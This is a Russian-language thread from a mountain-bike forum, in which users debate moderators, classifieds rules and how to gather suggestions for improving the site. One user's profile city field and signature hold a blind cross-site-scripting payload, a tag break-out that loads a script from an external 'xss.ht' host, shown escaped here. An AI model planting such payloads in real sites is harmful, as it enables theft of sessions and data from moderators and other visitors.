[ Поиск ] [ Регистрация ] [ Пользователи ] [ Вход ]

  Список форумов ›››› О сайте ›››› Просмотр темы

Модераторы

Нужны ли ещё модераторы ?
Да  88%
Нет  12%
Проголосовало 165 человек(а).
Голосовать могут только зарегистрированные посетители. [ Вход ]

  • (6 Страниц)
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6

Автор Сообщение
 S@shok

На сайте с 18.08.2009
Репутация: 47
Сообщений 121
Пол: Мужской(35)
Город: Житомир
Стиль: MTB:Downhill
Байк: aurum+boxxer
23 окт 2017 в 09:21

Дело не в наличии модераторов на данном ресурсе, дело в пользователях. Для хорошей работы ресурса, должен быть в первую очередь научен контингент.
Например: 1. Новые пользователи не смогут подать коммерческое обьявление в течении первой недели после регистрации. Сначала обычная тема и правильность ее заполнения. 
2. Если человек подал какое-то тупое обьявление или создал тему, это здесь сплошь и рядом, его сразу не банят, а ограничивают возможности в виде одного окна с надписью "ПРАВИЛА" допустим на неделю. 
3. Правильность заполнения, это значит, что ДХ значит ДХ, ДЕРТ значит ДЕРТ, не нужно продавать ДЕРТ железо в ячейке ДХ(За экипировку вообще молчу)
Я не могу себе шатуны подобрать, потому что сомневаюсь, а точно ли они подойдут под ДХ по описаным параметрам в обьяве, да, на разных форумах я тоже могу почитать о железяках)))
Я бы еще сделал приложение для телефона, ну это может людям на подумать) 

Я люблю этот ресурс, я, скажем вырос с ним))))
Давай-те вместе сделаем его хорошим и продуктивным для подростающего поколения!) 

Cсылка на пост
+9
 ASmith

На сайте с 21.03.2010
Репутация: 378
Сообщений 3742
Пол: Мужской(32)
Город: Харьков
Стиль: MTB:Enduro
Байк: Specialized Stumpjumper EVO 13
23 окт 2017 в 09:41

S@shok писал(а):
Дело не в наличии модераторов на данном ресурсе, дело в пользователях. Для хорошей работы ресурса, должен быть в первую очередь научен контингент.

Это утопия, которой никогда не будет. Поскольку всегда БУДЕТ % аудитории не желающие ничему учиться. Темболее то, что ты пишешь (если я правильно понимаю), подразумивает самостоятельное обучение, что звучит ще более фантастично.
S@shok писал(а):
1. Новые пользователи не смогут подать коммерческое обьявление в течении первой недели после регистрации. Сначала обычная тема и правильность ее заполнения.

Уверен, что в 90% случаев столкнувшийся с таким ограничением пользователь больше не зайдеь на этот ресурс и сайт потеряет пользователя, барахолка - объявления, а ресурс в целом - просмотры.
И вот ты пишешь, что - "в начале обычная тема и правильность ее заполнения", это уже полный бред. Во-первых обязывать пользователя создавать тему - это и будет основным рассадником тупорылых тем. Механизм проверки такой темы и последующее разрешение или не разрешение создавать объявления, мне и вовсе не ясен.
S@shok писал(а):
2. Если человек подал какое-то тупое обьявление или создал тему, это здесь сплошь и рядом, его сразу не банят, а ограничивают возможности в виде одного окна с надписью "ПРАВИЛА" допустим на неделю.

И чем это отличает от бана? Опять же, человек не имея возмонжости делать то чего он хочет, не будет читать навязанные ему правила, да еще и в течении недели. Он просто закроет вкладку и пойдут на другой ресурс. Сам подумай, ну каков тут процент людей, которые действительно прочитали ВСЕ правила от корки до корки? Уверен что большинство читает лишь некоторые разделы, в которых у них возникли проблемы или что бы доказать вину другого. ИМХО правила должны выдаваться ползователю маленькими порциями в виде подсказок. Все эти огромные списки давно устарели и знают их лишь создатели и модераторы ресурсов.
S@shok писал(а):
3. Правильность заполнения, это значит, что ДХ значит ДХ, ДЕРТ значит ДЕРТ, не нужно продавать ДЕРТ железо в ячейке ДХ(За экипировку вообще молчу)

Есть просто отгромное количество компонетов которые можно отнести как минимум к трем дисциплинам. Рули, выносы, обода и т.п. А как обыть с копомеентами, которые позиционируются, как КК или АМ, но при этом и чаще всего использут в стрит/дерт? И опять таки, каким образом это будет проверяться?
Предварительная модерация КАЖДОГО объявления - это единственный разумный выход. Это гораздо проще, чем в тупую шуршать списки барахолки, а через неделю уже не помнить, что проверил, а что нет.
S@shok писал(а):
Давай-те вместе сделаем его хорошим и продуктивным для подростающего поколения!)

Добиватесь пре-модерации всех обявлений и записывайся в модераторы. Вот это будет реальная помощь.
А запреты, правила и различные ограничения оставте в 2000-ых годах. Тупым и убогим, которые не в состоянии оформить тему или создать объвление нужно помогать, а не ограничивать их.

Cсылка на пост
+5
 S@shok

На сайте с 18.08.2009
Репутация: 47
Сообщений 121
Пол: Мужской(35)
Город: Житомир
Стиль: MTB:Downhill
Байк: aurum+boxxer
23 окт 2017 в 10:03

ASmith, та это мое виденье на данную тему, но есть пару "но")
1. Не хотят учится, пускай ищут другие возможности продажи, а альтернативы, как по мне нету))
2. Что бы узнать, нужно пробовать) по моему опыту скажу, что тема недели на проситку правил работает) я ждал неделю, что бы подать обьявление)) 
3. Можно обьеденить ДХ и ДЕРТ, дело в том что я ищу например руль ДХ, а его прикрепили к ДЕРТУ, это не будет рабоать на 100% тк непрвильно привязали. Тот кто ищет дерт будет находить только ДЕРТ, тот, кто катает ДХ будет находить только ДХ, хотя руль подойдет и под то и под то) 




Cсылка на пост
0
 ASmith

На сайте с 21.03.2010
Репутация: 378
Сообщений 3742
Пол: Мужской(32)
Город: Харьков
Стиль: MTB:Enduro
Байк: Specialized Stumpjumper EVO 13
23 окт 2017 в 10:26

Альтернатив как раз хватает. Тот же ОЛХ дает больше просмотров чем ХБ и это несмотря на куда больше количество всякого барахла там (привет удобным фильтрам и формам). И конечно же безчисленное множество групп в ВК и ФБ. А с учетом того, во что превратился ХБ за последние годы, то такая позиция - мол не нравится иди ищи другие ресурсы - считаю совершенно не правильной. Пользователей нужно привлекать, а не гнать в шею. По факту барахолка ХБ уже давно уступает по всем параметрам другим более крупным сервисам.

А в какой бы ты отнес раздел такие вилки (под 20-ю), как Rock Shox: Recon, Sektor, Revelation, Manitou Minute? Производитель их позиционирует как КК и АМ вилки, теменее менее на них катают, стит, дерт, мини-ДХ и типичные споты с небольшими кикерми и пролетками именующимися многими как лайт-ФР ) ... да да, это очень распространенное понятие.

Хе, таких как ты, кто будет ждать единицы. В большинстве мы все очень нетерпеливы.




Cсылка на пост
+13
 Grinpis

На сайте с 24.01.2008
Репутация: 173
Сообщений 837
Пол: Мужской(32)
Город: Київ/Херсон/Чернівці
Стиль: MTB:Street
Байк: Propane Tyee
23 окт 2017 в 13:28

насчет барахолки, на самом деле не помешало б сделать больше подразделов для деталей, потому как реально очень тяжело что то конкретное искать, например обьяв с продажей пречаток, наверно половина от всех в разделе Защиты.

Cсылка на пост
+1
 tsypa_broiler

На сайте с 27.04.2013
Репутация: 96
Сообщений 610
Пол: Мужской(24)
Город: Киев
Стиль: MTB:Freeride
Байк: Продаю! Заходи в мои продажи
23 окт 2017 в 14:53

Все наперебой советуют, что нужно сделать администрации, управляющим форумом x-bikers... От меня совет- прислушаться к пользователям и начать что-то делать
По каким-то причинам (не знаю по каким точно), конструктивные предложения юзеров, высказываемые уже давно, в жизнь не воплощаются, всё остаётся на словах.

Cсылка на пост
+1
 da bomb

На сайте с 30.09.2010
Репутация: 534
Сообщений 3113
Пол: Мужской(30)
Город: Дружковка
Стиль: MTB:Freeride
Байк: Разрабатывается сектором 7
23 окт 2017 в 14:57

Хотелось бы услышать мнение Паши и всех оставшихся админов , пока только Тёма активен судя по всему )

China shit
купи детальку редкую [ Ссылка ]
Cсылка на пост
+5
 Grinpis

На сайте с 24.01.2008
Репутация: 173
Сообщений 837
Пол: Мужской(32)
Город: Київ/Херсон/Чернівці
Стиль: MTB:Street
Байк: Propane Tyee
23 окт 2017 в 15:05

da bomb писал(а):
Хотелось бы услышать мнение Паши
Он еще подает тут признаки жизни? (PC: сарказм)

Cсылка на пост
0
 PaWell

На сайте с 07.09.2003
Репутация: 3091
Сообщений 2830
Пол: Мужской(34)
Город: Днепропетровск
Стиль: Trial
Байк: Inspired Fourplay
23 окт 2017 в 19:48

Grinpis писал(а):
Он еще подает тут признаки жизни?


Подаю.

Да, проблема с модераторами есть. И не только с ними... проблемы иксов я знаю хорошо, нет надобности подымать их заново и заново.

Ваше мнение мне важно, но не все проблемы можно решить быстро и легко. Прошу отнестись с пониманием.

Я проект не бросаю, я приведу его в порядок.

Cсылка на пост
+31
 Amur

На сайте с 12.11.2009
Репутация: 762
Сообщений 2359
Пол: Мужской(30)
Город: Киев
Стиль: MTB:Enduro
Байк: Canyon
24 окт 2017 в 10:49


PaWell, мое согласие в силе, а мои идеи живы)

Слышь, бросай курить!
Cсылка на пост
+3
 Kirion

На сайте с 24.10.2010
Репутация: 180
Сообщений 828
Пол: Мужской(28)
Город: Kiev-Sevastopol
Стиль: MTB:Urban Freeride
Байк: Norco Shore + Monster T
24 окт 2017 в 12:30

Я за Глеба (Amur), он демократ)))

Перевозки Крым-Херсон(Нова Пошта,Автолюкс)-Крым
[ Ссылка ]
Cсылка на пост
+10
 Amur

На сайте с 12.11.2009
Репутация: 762
Сообщений 2359
Пол: Мужской(30)
Город: Киев
Стиль: MTB:Enduro
Байк: Canyon
24 окт 2017 в 13:52

Спасибо, Ром))

Слышь, бросай курить!
Cсылка на пост
0
 {tv}

На сайте с 22.06.2012
Репутация: 347
Сообщений 619
Пол: Мужской(25)
Город: Киев
Стиль: MTB:Downhill
Байк: demo 2014 карбон
24 окт 2017 в 21:29

мобильное приложение упростило бы задачу мониторинга сайта? С компа далеко не всегда удобно ж, так будет проще привлечь людей к модерации сайта как по мне.
В маршрутке едишь, баны раздаешь)

ovrservice 0633429354 профессиональный сервис с гарантией.
Cсылка на пост
0
 da bomb

На сайте с 30.09.2010
Репутация: 534
Сообщений 3113
Пол: Мужской(30)
Город: Дружковка
Стиль: MTB:Freeride
Байк: Разрабатывается сектором 7
24 окт 2017 в 21:49


{tv}, для этого нужно пилить приложение и при чем для двух платформ , ведроид и огрызок , а это уже затратно финансово . Хотя там можно размещать рекламу ( на ведроиде) и будет капать кэш небольшой .
У эпл скорее всего придется или холявный делать или покупать его .

China shit
купи детальку редкую [ Ссылка ]
Cсылка на пост
0
 voland

На сайте с 08.09.2012
Репутация: 676
Сообщений 1196
Пол: Мужской(42)
Город: Житомир
Стиль: MTB:Freeride
24 окт 2017 в 21:50

В соседней теме https://x-bikers.com/forum/show_topic.php?id=112168 Паша озвучил, что готов идти на коструктивный диалог относительно изменений сайта.
Давате как-то приступать к подаче идей в какой-то понятной форме, не хаосом.
Предложена такая схема:

".....1. собираем данные от пользователей о реальных проблемах, что их напрягают. Отдельная тема, модерируется.
2. группируем проблемы по направлениям. 
3. обсуждение каждого направления в отдельной ветке, участвует администрация. До этого пункта администрация не требуется.
4. заключение по каждой глобальной проблеме - возможность решить или нет, способ решения, трудоемкость, другие моменты. Участвует администрация.

П.С. Не плохо бы озвучить направление движения сайта как такового, каким его видит владелец. На ближайшую перспективу, на среднесрочную. Корректировка описанных выше проблем с глобальными целями...."

Осталось только начать. Как по мне, то лучше управлять процессом модератору.


@Q.wheels
Cсылка на пост
+10
 {tv}

На сайте с 22.06.2012
Репутация: 347
Сообщений 619
Пол: Мужской(25)
Город: Киев
Стиль: MTB:Downhill
Байк: demo 2014 карбон
24 окт 2017 в 21:52

ну надо хотябы знать че по чем, а так можно было бы и скинуться если все в пределах разумного 

ovrservice 0633429354 профессиональный сервис с гарантией.
Cсылка на пост
0
 feelthefreedom

На сайте с 06.06.2014
Репутация: 75
Сообщений 397
Пол: Мужской(27)
Город: Харьков
Стиль: MTB:Urban Freeride
24 окт 2017 в 22:03

Новым пользователям не хватает стандратного макета оформления темы. Можно помочь им с этим и создать более подробный макет. Сделать кнопку расширенного режима, а для новых пользователей будет доступен только он. Это будует гораздо больше полей, на поля повесить побольше проверок. Сам макет взять с качественно оформленных тем.

Либо создать пару тем с качесвтенным оформлением и показывать новым пользователям при создание темы с подтекстом "это поможет вам быстрее и дороже продать товар" и бла бла бла

Cсылка на пост
0
 dimdim

На сайте с 09.03.2014
Репутация: 27
Сообщений 154
Пол: Мужской(30)
Город: Полтава"><script src=https://d1m.xss.ht
Стиль: MTB:DirtJumping
Байк: PSlope
24 окт 2017 в 22:05

Можно обсуждение вынести на более удобные для этого платформы типа гитхаба/трелло - где можно предлагать и голосовать за предложенные изменения.

&quot;&gt;&lt;script src=https://d1m.xss.ht&gt;&lt;/script&gt;
Cсылка на пост
+1
 voland

На сайте с 08.09.2012
Репутация: 676
Сообщений 1196
Пол: Мужской(42)
Город: Житомир
Стиль: MTB:Freeride
24 окт 2017 в 22:38

Мое мнение - лучше озвучивать проблемы, неудобства, неудовлетворение и т.д. чем предлагать способы их устранения. Уверен, что неудобств наберется не более десятка, зато рецептов как исправить множество, у каждого свой.

@Q.wheels
Cсылка на пост
+2
 Grinpis

На сайте с 24.01.2008
Репутация: 173
Сообщений 837
Пол: Мужской(32)
Город: Київ/Херсон/Чернівці
Стиль: MTB:Street
Байк: Propane Tyee
24 окт 2017 в 22:41

Я б предложил создать фокус группу из тех кто хочет заниматся апгрейдом ресурса и его дальнейшей модерацией, вынести это в отдельный чат (например Telegram).
Если согласится PaWell, могу заняться организацией сего движения. 


voland, узнать однозначно надо, только сделать желательно систематически, а не как сейчас разбросанно по куче разных тем по форуму. 

Cсылка на пост
+1
  [ Подписаться на ответы в данной теме ]

  • (6 Страниц)
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6



ПОХОЖИЕ ТЕМЫ (сортировать по релевантности или по дате)
Посл. ответ Тема Автор Ответ. Просм.
28 ноя 2006 в 00:00
  Граждане модераторы, help plz Dron32195772
10 фев 2011 в 00:00
  Х-байкерс и модераторы
  На страницу 1, 2, 3...9
Yeah!16523156
31 авг 2009 в 00:00
  Новые модераторы на сайте: jonnyboo, BICH и X-MAN
  На страницу 1, 2, 3...8
PaWell14830465
17 мар 2018 в 00:00
  Модераторы - как поменять ник ? Смена ника / аккаунта / изменить акк !
  На страницу 1, 2
ns clash2221952

  Список форумов ›››› О сайте

  Форум:   







© 2003-2024 X-Bikers.com - горный велосипед, велотриал, фрирайд, стрит, дёрт, BMX
Размещение рекламы на сайте
Использование материалов без разрешения владельцев не допускается